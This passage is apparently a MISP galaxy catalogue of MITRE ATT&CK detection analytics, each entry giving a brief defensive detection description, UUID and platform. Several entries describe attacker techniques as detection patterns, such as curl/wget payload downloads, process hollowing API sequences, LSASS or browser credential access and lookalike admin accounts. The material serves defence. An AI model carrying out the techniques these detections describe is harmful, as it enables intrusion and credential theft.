Monitors use of archive or encryption tools (zip, openssl) tied to user-scripted activity or binaries writing encoded payloads under /Users or /Volumes.

Internal MISP references

UUID 1c2e527f-b9ff-4e1d-896d-0c1257f0abc1 which can be used as unique global reference for Analytic 1066 - AN1066 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1066
mitre_platforms ['macOS']

Analytic 0166 - AN0166

Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk.

Internal MISP references

UUID 62d55c57-54a3-4c6f-8d0d-2684fa26c347 which can be used as unique global reference for Analytic 0166 - AN0166 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0166
mitre_platforms ['Linux']

Analytic 0616 - AN0616

Detects USB device insertion followed by high-volume or sensitive file access and staging activity by suspicious processes or accounts.

Internal MISP references

UUID 67ff7cc5-7b9b-4d15-b115-b55c3d164c64 which can be used as unique global reference for Analytic 0616 - AN0616 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0616
mitre_platforms ['Windows']

Analytic 0661 - AN0661

Detection of modified boot-time configuration scripts that persist malicious CLI commands across reboots.

Internal MISP references

UUID b053dbd4-ad1e-45e1-a6b7-af2a5d931c82 which can be used as unique global reference for Analytic 0661 - AN0661 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0661
mitre_platforms ['Network Devices']

Analytic 1606 - AN1606

Adversary creates new users using 'dscl' commands, GUI tools, or by modifying user plist files. Detection includes monitoring dscl invocation and user-related plist changes.

Internal MISP references

UUID ddaf8ed8-f6bd-4eac-911c-d9fd243e87e9 which can be used as unique global reference for Analytic 1606 - AN1606 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1606
mitre_platforms ['macOS']

Analytic 1660 - AN1660

On Android, the user can review which applications can use premium SMS features in the "Special access" page within application settings. Application vetting services can detect when applications request the SEND_SMS permission, which should be infrequently used.

Internal MISP references

UUID ccb42e9d-557f-4dc5-b313-75fb6b212821 which can be used as unique global reference for Analytic 1660 - AN1660 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1660
mitre_platforms ['iOS']

Analytic 0716 - AN0716

Initiation of remote desktop sessions via AnyDesk, TeamViewer, or Chrome Remote Desktop accompanied by unexpected user logins or system modifications.

Internal MISP references

UUID 1d46bf4d-a090-4865-9205-e271d223da42 which can be used as unique global reference for Analytic 0716 - AN0716 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0716
mitre_platforms ['macOS']

Analytic 0167 - AN0167

Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories.

Internal MISP references

UUID 56552a3e-9934-4809-97a4-67d62f29478c which can be used as unique global reference for Analytic 0167 - AN0167 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0167
mitre_platforms ['macOS']

Analytic 1607 - AN1607

Adversary creates users via IAM/IdP API or portal (e.g., Azure AD, Okta). Detection involves monitoring API calls, admin action logs, and correlation with role assignments.

Internal MISP references

UUID 7947aae5-fd76-403c-8c73-1300dff7d30f which can be used as unique global reference for Analytic 1607 - AN1607 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1607
mitre_platforms ['Identity Provider']

Analytic 0761 - AN0761

Applications or launchd jobs initiating encrypted TLS traffic to rare external hosts. Defender observes unified logs showing SSL/TLS API calls by processes that are not baseline-approved, and payload entropy suggesting encrypted C2 sessions.

Internal MISP references

UUID 80c5c2fd-eb3a-4678-9d3b-6147a90284de which can be used as unique global reference for Analytic 0761 - AN0761 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0761
mitre_platforms ['macOS']

Analytic 1067 - AN1067

Identifies transfer of base64, uuencoded, or high-entropy files over HTTP, FTP, or custom protocols in lateral movement or exfiltration streams.

Internal MISP references

UUID 97a188cf-5851-4cb7-9bb5-17702707d52b which can be used as unique global reference for Analytic 1067 - AN1067 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1067
mitre_platforms ['Network Devices']

Analytic 0617 - AN0617

Detects USB block device mount followed by file access in sensitive directories or high-volume copy operations by user-controlled processes.

Internal MISP references

UUID 9cf3c7bb-296e-445a-ba30-012060b9ccac which can be used as unique global reference for Analytic 0617 - AN0617 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0617
mitre_platforms ['Linux']

Analytic 0176 - AN0176

Unquoted service or shortcut paths that contain spaces and allow path interception by higher-level executables. Defender observes registry service configurations with unquoted paths, file creation of executables in parent directories of unquoted paths, and subsequent process execution from unexpected locations.

Internal MISP references

UUID a972f507-cf1b-4e2f-acdc-877a7891b7cf which can be used as unique global reference for Analytic 0176 - AN0176 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0176
mitre_platforms ['Windows']

Analytic 1076 - AN1076

Detects adversary use of suspended process creation, using the CREATE_SUSPENDED flag via CreateProcess, followed by unmapping the memory of the child process (NtUnmapViewOfSection) and replacing it with malicious code via VirtualAllocEx/WriteProcessMemory, then SetThreadContext and ResumeThread to begin execution within the hollowed process.

Internal MISP references

UUID bcb01d01-66f6-47bb-9ca1-46b4ce686ad4 which can be used as unique global reference for Analytic 1076 - AN1076 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1076
mitre_platforms ['Windows']

Analytic 0671 - AN0671

Monitor for abnormal certificate enrollment and usage activity in Active Directory Certificate Services (AD CS), registry access to certificate storage locations, and unusual process executions that attempt to export or access private keys.

Internal MISP references

UUID c448cbb5-1256-4a00-8582-1759fb5a6e56 which can be used as unique global reference for Analytic 0671 - AN0671 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0671
mitre_platforms ['Windows']

Analytic 1760 - AN1760

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 3307605e-f2ac-4cfb-be12-5d880e1bfa11 which can be used as unique global reference for Analytic 1760 - AN1760 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1760
mitre_platforms ['Android']

Analytic 1670 - AN1670

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID de37eb78-5f35-4327-99d0-ad6546ab0fb6 which can be used as unique global reference for Analytic 1670 - AN1670 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1670
mitre_platforms ['iOS']

Analytic 1706 - AN1706

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID f44bab9b-554c-4dc7-b57f-4011ce609c2b which can be used as unique global reference for Analytic 1706 - AN1706 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1706
mitre_platforms ['Android']

Analytic 0816 - AN0816

Detects API calls registering or updating hybrid identity connectors, modification of cloud-to-on-premises federation trust, and unusual token issuance logs.

Internal MISP references

UUID 80e4f847-a149-423b-a179-cbcf4afd06b9 which can be used as unique global reference for Analytic 0816 - AN0816 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0816
mitre_platforms ['IaaS']

Analytic 0186 - AN0186

Chain: (1) udev / kernel logs show hot-plug (USB/Thunderbolt/PCIe); (2) block device created by udisks/diskarbitration; (3) optional: new network interface or DHCP lease observed. Correlate /var/log/messages|syslog, auditd SYSCALL open/creat on /dev, and DHCP/Zeek.

Internal MISP references

UUID 81cd2610-bc6c-46bf-8d3c-d6e30c7f51c8 which can be used as unique global reference for Analytic 0186 - AN0186 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0186
mitre_platforms ['Linux']

Analytic 0618 - AN0618

Detects external volume mount with Finder, Terminal, or script-initiated file copy from user profiles, sensitive folders, or cloud storage sync directories to USB.

Internal MISP references

UUID 9d7fd025-d8eb-48ab-8fca-df6b09761aec which can be used as unique global reference for Analytic 0618 - AN0618 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0618
mitre_platforms ['macOS']

Analytic 0681 - AN0681

Defenders may observe attempts to alter cryptographic settings on network devices that reduce key strength or allowable cipher suites. Suspicious indicators include configuration changes that downgrade encryption algorithms, key length parameters, or the disabling of strong encryption in favor of legacy ciphers. These activities often appear as CLI commands modifying crypto policies, firmware changes affecting crypto libraries, or unexpected updates to key management files. Correlation across device config logs and traffic analysis showing weaker ciphers provides higher confidence of malicious key space reduction.

Internal MISP references

UUID b9e42cd6-da26-4e57-b628-aca0fb1bb3f3 which can be used as unique global reference for Analytic 0681 - AN0681 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0681
mitre_platforms ['Network Devices']

Analytic 0861 - AN0861

Detection focuses on identifying unauthorized or anomalous changes to compute infrastructure components. Defender perspective: monitor for creation, deletion, or modification of instances, volumes, and snapshots outside of approved change management windows; correlate abnormal activity such as rapid snapshot creation followed by new instance mounts, or repeated infrastructure changes by rarely used accounts. Flagging activity linked to unusual geolocation, API client, or automation script is suspicious.

Internal MISP references

UUID c9be9fb3-460f-42bc-9b56-3bb88839aeab which can be used as unique global reference for Analytic 0861 - AN0861 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0861
mitre_platforms ['IaaS']

Analytic 1608 - AN1608

Account creation via cloud service APIs or CLI, often associated with key generation. Monitored via CloudTrail or equivalent audit logs.

Internal MISP references

UUID d715d148-4d2d-407c-bd83-c471a4163d4e which can be used as unique global reference for Analytic 1608 - AN1608 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1608
mitre_platforms ['IaaS']

Analytic 1086 - AN1086

A process or terminal command outside of standard shell utilities reads the user's .bash_history file. On macOS, unified logs or telemetry tools like EndpointSecurity (ESF) may observe file read APIs or terminal process lineage that shows non-user-initiated access.

Internal MISP references

UUID ead38dff-ee26-477d-be5a-69b52dc8bd50 which can be used as unique global reference for Analytic 1086 - AN1086 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1086
mitre_platforms ['macOS']

Analytic 1068 - AN1068

Detects encoded PowerCLI or Base64-encoded payloads staged via datastore uploads or shell access (e.g., ESXi Shell or backdoored VIBs).

Internal MISP references

UUID f1ec63bc-294c-471c-ae9f-4dd70f3c036a which can be used as unique global reference for Analytic 1068 - AN1068 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1068
mitre_platforms ['ESXi']

Analytic 0168 - AN0168

Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.

Internal MISP references

UUID fac5b2df-a58d-424e-a351-7d7ca05260e8 which can be used as unique global reference for Analytic 0168 - AN0168 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0168
mitre_platforms ['ESXi']

Analytic 1806 - AN1806

The user can view a list of active device administrators in the device settings.

Internal MISP references

UUID 75eaee42-f7b5-4792-9611-74626bd98838 which can be used as unique global reference for Analytic 1806 - AN1806 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1806
mitre_platforms ['Android']

Analytic 1680 - AN1680

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID 8e20de5b-1b9c-4443-a095-bcdd52ed161e which can be used as unique global reference for Analytic 1680 - AN1680 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1680
mitre_platforms ['iOS']

Analytic 1960 - AN1960

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 10222534-1e1d-473c-a2cb-674126f87ad8 which can be used as unique global reference for Analytic 1960 - AN1960 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1960
mitre_platforms ['PRE']

Analytic 0196 - AN0196

Detects rsync or scp inbound from other hosts that then aggregate content into /Users/Shared or /private/tmp, often involving compressed files or scripts.

Internal MISP references

UUID 2891bd53-5a81-4330-bb05-ffd731868d06 which can be used as unique global reference for Analytic 0196 - AN0196 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0196
mitre_platforms ['macOS']

Analytic 0691 - AN0691

CONTAINERS (Docker/K8s/containerd): A user pulls an untrusted image from a public/unknown registry and then creates/starts a container from that image. Shortly after start, the container spawns unexpected utilities (e.g., curl/wget/bash/python), or makes outbound network connections atypical for the namespace/workload. The analytic correlates Image Creation/Download → Container Creation → Container Start → Command Execution/Network activity within a short window and with a consistent image digest.

Internal MISP references

UUID 4c16cebd-ac7e-472a-ae12-62966cbd19e2 which can be used as unique global reference for Analytic 0691 - AN0691 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0691
mitre_platforms ['Linux']

Analytic 0619 - AN0619

Unusual or unauthorized processes accessing microphone APIs (e.g., winmm.dll, avrt.dll) followed by audio file writes to user-accessible or temp directories.

Internal MISP references

UUID 5aaad268-48fb-4826-9f68-b666e1b4a3bf which can be used as unique global reference for Analytic 0619 - AN0619 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0619
mitre_platforms ['Windows']

Analytic 1609 - AN1609

Unexpected creation or modification of files with com.apple.ResourceFork extended attributes containing unusually large or non-standard data. Defender perspective: detection of resource forks in contexts where they are uncommon, especially when paired with process execution or network activity.

Internal MISP references

UUID 619804e7-5ae7-4c6e-b1bb-e1d10a22cc87 which can be used as unique global reference for Analytic 1609 - AN1609 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1609
mitre_platforms ['macOS']

Analytic 1069 - AN1069

Detects rogue Wi-Fi access points broadcasting the same SSID as legitimate APs with stronger signal strength, unexpected MAC/BSSID values, or inconsistent encryption settings. Correlates authentication attempts, captive portal redirections, and anomalous traffic flows through unauthorized APs.

Internal MISP references

UUID 670462e3-6c3e-4779-af75-2a0424a5d221 which can be used as unique global reference for Analytic 1069 - AN1069 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1069
mitre_platforms ['Network Devices']

Analytic 0916 - AN0916

Detection of anomalous driver and firmware interactions, including unsigned or unexpected firmware updates, driver loads linked to hardware components, and suspicious use of privileged APIs to read/write firmware or controller memory.

Internal MISP references

UUID 6f2fdf37-f603-4264-aed1-24fe2d1aa094 which can be used as unique global reference for Analytic 0916 - AN0916 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0916
mitre_platforms ['Windows']

Analytic 1096 - AN1096

Correlation of file creation/modification of .desktop files within XDG autostart directories, followed by execution of processes at user login initiated by the desktop environment. Malicious entries typically include suspicious Exec paths or anomalous names and are not associated with installed packages.

Internal MISP references

UUID 7bd7f602-0f85-4e96-bd40-ae4a6f490b32 which can be used as unique global reference for Analytic 1096 - AN1096 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1096
mitre_platforms ['Linux']

Analytic 0961 - AN0961

Defenders may observe unauthorized modifications to encryption-related configuration files, firmware, or crypto modules on network devices. Suspicious patterns include changes to cipher suite configurations, unexpected firmware updates affecting crypto libraries, disabling of hardware cryptographic accelerators, or reductions in key length policies. Correlating configuration changes with anomalies in encrypted traffic characteristics (e.g., weaker ciphers or sudden plaintext transmission) strengthens detection.

Internal MISP references

UUID b192336c-4a85-4322-9ae8-fd6eb6b7747b which can be used as unique global reference for Analytic 0961 - AN0961 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0961
mitre_platforms ['Network Devices']

Analytic 0169 - AN0169

Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks.

Internal MISP references

UUID c93951a7-7f78-40cf-a891-30d6c6a9bee6 which can be used as unique global reference for Analytic 0169 - AN0169 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0169
mitre_platforms ['Network Devices']

Analytic 1690 - AN1690

Remote access software typically requires many privileged permissions, such as accessibility services or device administrator.

Internal MISP references

UUID a180ad2e-e3fa-4cec-a1f0-8baf754d9543 which can be used as unique global reference for Analytic 1690 - AN1690 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1690
mitre_platforms ['iOS']

Analytic 0771 - AN0771

Detection of new IAM roles or policies attached to a user/service in AWS/GCP/Azure outside normal patterns or hours, often following account compromise.

Internal MISP references

UUID 04412d94-62ac-4484-9408-c4ca1c206f1b which can be used as unique global reference for Analytic 0771 - AN0771 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0771
mitre_platforms ['IaaS']

Analytic 1077 - AN1077

Detects adversary behavior where a newly created or renamed user account closely resembles existing service or administrator accounts to blend in and avoid detection. Common patterns include prefix/suffix modifications, homoglyphs, or use of names like 'admin1', 'adm1n', or 'backup_help'.

Internal MISP references

UUID 8c3a43bc-dd07-4e72-a987-a2dc36e162fa which can be used as unique global reference for Analytic 1077 - AN1077 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1077
mitre_platforms ['Windows']

Analytic 0177 - AN0177

Defenders may detect abuse of container administration commands by observing anomalous use of management utilities (docker exec, kubectl exec, or API calls to kubelet) correlated with unexpected process creation inside containers. Behavioral chains include unauthorized API requests followed by command execution within running pods or containers, often originating from unusual user accounts, automation scripts, or IP addresses outside the expected cluster management plane.

Internal MISP references

UUID ab1122c5-f459-4097-8ba7-f5a7960d2da5 which can be used as unique global reference for Analytic 0177 - AN0177 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0177
mitre_platforms ['Containers']

Analytic 0717 - AN0717

Defenders may detect adversaries forging web credentials in IaaS environments by monitoring for anomalous API activity such as AssumeRole or GetFederationToken being executed by unusual principals. These events often correlate with sudden logon sessions from unfamiliar IP addresses or regions. The chain is usually secret material misuse (stolen private key or password) → API request generating a new token → access to high-value resources.

Internal MISP references

UUID fca70138-f183-4deb-b2a4-59908c76070b which can be used as unique global reference for Analytic 0717 - AN0717 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0717
mitre_platforms ['IaaS']

Analytic 1770 - AN1770

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block command and control traffic.

Internal MISP references

UUID ab85ff40-2b75-477a-b5ec-f35f2fcde728 which can be used as unique global reference for Analytic 1770 - AN1770 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1770
mitre_platforms ['Android']

Analytic 1707 - AN1707

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID cb4c4b76-3f6d-4387-ab20-74b461bbb211 which can be used as unique global reference for Analytic 1707 - AN1707 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1707
mitre_platforms ['iOS']

Analytic 0817 - AN0817

Detects tenant-wide authentication or conditional access changes that weaken hybrid identity enforcement, including disabling AD FS or bypassing hybrid MFA policies.

Internal MISP references

UUID 07b8a45e-6435-4c67-ac15-47db21c1d1b9 which can be used as unique global reference for Analytic 0817 - AN0817 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0817
mitre_platforms ['Office Suite']

Analytic 0871 - AN0871

Multi-event correlation of Registry creation under Active Setup with anomalous execution of processes at user logon. Behavioral patterns include creation/modification of HKLM Active Setup keys with non-standard StubPath values, followed by process execution from uncommon paths, unsigned binaries, or unusual parent-child lineage post-user login.

Internal MISP references

UUID 0be2ac94-5f56-4bdc-bf07-ec9ea08c8bb7 which can be used as unique global reference for Analytic 0871 - AN0871 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0871
mitre_platforms ['Windows']

Analytic 0178 - AN0178

Behavioral chain: (1) a user-facing app (browser/Office/email client) launches a URL or handles a link, then (2) the same process lineage makes an outbound connection to an untrusted domain/IP, (3) a file is downloaded or unpacked to a user-writable location shortly after the click. Optional enrichment: subsequent child execution by LOLBINs.

Internal MISP references

UUID 12849ba4-39da-48c9-bf3d-c51a6cc3f85b which can be used as unique global reference for Analytic 0178 - AN0178 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0178
mitre_platforms ['Windows']

Analytic 0187 - AN0187

Chain: (1) unified logs report IOUSBHost/IOThunderbolt device arrival; (2) diskarbitrationd attaches a new volume; (3) optional: config profile manipulation or new network interface MAC obtains a lease. Correlate unifiedlogs (subsystems: IOUSBHost, IOKit, diskarbitrationd), FSEvents, and DHCP/Zeek.

Internal MISP references

UUID 5bbe0089-4927-4415-bff7-14a3ba5543c0 which can be used as unique global reference for Analytic 0187 - AN0187 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0187
mitre_platforms ['macOS']

Analytic 1078 - AN1078

Detects creation or renaming of accounts with names that closely match known service, root, or admin accounts. Behavior often follows account discovery or deletion, attempting to blend into system activity logs using trusted name conventions.

Internal MISP references

UUID 5f584d00-63b5-44c5-b629-ff238f5b9931 which can be used as unique global reference for Analytic 1078 - AN1078 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1078
mitre_platforms ['Linux']

Analytic 0718 - AN0718

Forged web credentials may manifest as anomalous SAML token issuance, OpenID Connect token minting, or Zimbra pre-auth key usage. Defenders may see tokens issued without normal authentication events, multiple valid tokens generated simultaneously, or signing anomalies in IdP logs.

Internal MISP references

UUID d1eafedb-ac64-46b0-972d-8f8759fc11b3 which can be used as unique global reference for Analytic 0718 - AN0718 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0718
mitre_platforms ['Identity Provider']

Analytic 0781 - AN0781

Behavior chain involving abnormal registry modifications via CLI, PowerShell, WMI, or direct API calls, especially targeting persistence, privilege escalation, or defense evasion keys (such as editing Notify/Userinit/Startup keys or disabling SafeDllSearchMode), potentially followed by service restart or process execution.

Internal MISP references

UUID de8d67d4-9d2a-4379-be8b-3ae3f3b3ac75 which can be used as unique global reference for Analytic 0781 - AN0781 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0781
mitre_platforms ['Windows']

Analytic 1087 - AN1087

Enumeration of identity roles and users via API calls such as Get-MsolRoleMember, az ad user list, or Graph API tokens from unauthorized users or automation accounts.

Internal MISP references

UUID f74ce996-0982-4e2a-86ee-5bce001ee9fc which can be used as unique global reference for Analytic 1087 - AN1087 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1087
mitre_platforms ['Identity Provider']

Analytic 1807 - AN1807

Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.

Internal MISP references

UUID 09ea8707-d76c-44ae-b077-19a8949faa90 which can be used as unique global reference for Analytic 1807 - AN1807 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1807
mitre_platforms ['Android']

Analytic 1708 - AN1708

Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS. Application vetting services may look for MANAGE_ACCOUNTS in an Android application’s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.

Internal MISP references

UUID 6bd50b74-5852-4800-b459-1c54d95348e3 which can be used as unique global reference for Analytic 1708 - AN1708 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1708
mitre_platforms ['Android']

Analytic 1780 - AN1780

Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. Look for strings or other signatures left in system artifacts related to decoding steganography.

Internal MISP references

UUID cda313bc-214f-4bf8-9aa2-b3fb495379c3 which can be used as unique global reference for Analytic 1780 - AN1780 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1780
mitre_platforms ['Android']

Analytic 1079 - AN1079

Detects adversary creation of cloud or IdP accounts whose names resemble existing privileged or service accounts. May indicate preparation for privilege escalation or defense evasion.

Internal MISP references

UUID 0252a0ff-a4fb-4196-9b43-d759af950d55 which can be used as unique global reference for Analytic 1079 - AN1079 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1079
mitre_platforms ['Identity Provider']

Analytic 0917 - AN0917

Detection of suspicious use of ioctl/sysfs calls to access device firmware, unexpected flashing tools execution, and anomalous firmware checksums logged by SMART or kernel audit mechanisms.

Internal MISP references

UUID 062580eb-eb79-4b31-b3fd-e500ebcfc128 which can be used as unique global reference for Analytic 0917 - AN0917 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0917
mitre_platforms ['Linux']

Analytic 0197 - AN0197

Detects remote writes or snapshots mounted from other systems into a central ESXi VMFS path or NFS store used for remote staging of files before exfiltration.

Internal MISP references

UUID 0e2094fe-6912-4bde-9e5a-9d95c640646a which can be used as unique global reference for Analytic 0197 - AN0197 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0197
mitre_platforms ['ESXi']

Analytic 0791 - AN0791

A remote DCOM invocation by a privileged account using RPC (port 135), followed by abnormal process instantiation or module loading on the remote system indicative of code execution.

Internal MISP references

UUID 0f94823c-ac95-48d8-9716-58f59d39974c which can be used as unique global reference for Analytic 0791 - AN0791 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0791
mitre_platforms ['Windows']

Analytic 1970 - AN1970

Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 4884ba77-1420-4093-9dba-65e881f6dca5 which can be used as unique global reference for Analytic 1970 - AN1970 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1970
mitre_platforms ['PRE']

Analytic 0971 - AN0971

Excessive outbound traffic via ping, curl, or custom scripts indicating flooding behavior, especially with no UI context or user interaction.

Internal MISP references

UUID a82a14f4-6fc9-43b5-b183-68af3cb075a2 which can be used as unique global reference for Analytic 0971 - AN0971 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0971
mitre_platforms ['macOS']

Analytic 0179 - AN0179

Behavioral chain: (1) browser/office/GUI mail client opens a URL, (2) outbound connection to untrusted domain, (3) a new file is saved in $HOME/Downloads, /tmp, or cache immediately after.

Internal MISP references

UUID bbfa2ed1-f8d5-44cf-9da8-5e3fed544172 which can be used as unique global reference for Analytic 0179 - AN0179 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0179
mitre_platforms ['Linux']

Analytic 1097 - AN1097

Monitor for runtime data manipulations by detecting suspicious modification of application binaries, API hooking, or unexpected behavior from processes responsible for rendering or displaying data. Correlate registry edits, process creation, and unexpected binary hash mismatches.

Internal MISP references

UUID c07e8730-b5cf-4a74-be3a-938184af42df which can be used as unique global reference for Analytic 1097 - AN1097 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1097
mitre_platforms ['Windows']

Analytic 0719 - AN0719

Forged web credentials on Windows endpoints may be detected by anomalous browser cookie files, local token cache manipulations, or tools injecting tokens into sessions. Defenders may observe processes accessing LSASS or browser credential stores unexpectedly, followed by unusual logon sessions.

Internal MISP references

UUID ff0d2f8d-1fff-4bda-94e6-c0cd50abe6ed which can be used as unique global reference for Analytic 0719 - AN0719 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0719
mitre_platforms ['Windows']

Analytic 1790 - AN1790

Applications could be vetted for their use of the clipboard manager APIs, with extra scrutiny given to applications that make use of them.

Internal MISP references

UUID 6a3e1244-3832-4523-81bc-56598a280b16 which can be used as unique global reference for Analytic 1790 - AN1790 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1790
mitre_platforms ['Android']

Analytic 1709 - AN1709

Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS. Application vetting services may look for MANAGE_ACCOUNTS in an Android application’s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.

Internal MISP references

UUID cbb3d486-b7a3-44f0-a7c7-e2fbf668f6fa which can be used as unique global reference for Analytic 1709 - AN1709 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1709
mitre_platforms ['iOS']

Analytic 1088 - AN1088

Use of AWS CLI (aws iam list-users, list-roles), Azure CLI (az ad user list), or GCP CLI (gcloud iam service-accounts list) from endpoints or cloud shells where such activity is unexpected.

Internal MISP references

UUID 3d124174-1e58-44e2-9f5b-f63394fb7a2e which can be used as unique global reference for Analytic 1088 - AN1088 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1088
mitre_platforms ['IaaS']

Analytic 0188 - AN0188

